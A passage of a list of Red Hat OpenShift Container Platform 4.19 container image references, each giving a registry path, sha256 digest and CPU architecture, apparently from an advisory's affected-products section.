"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
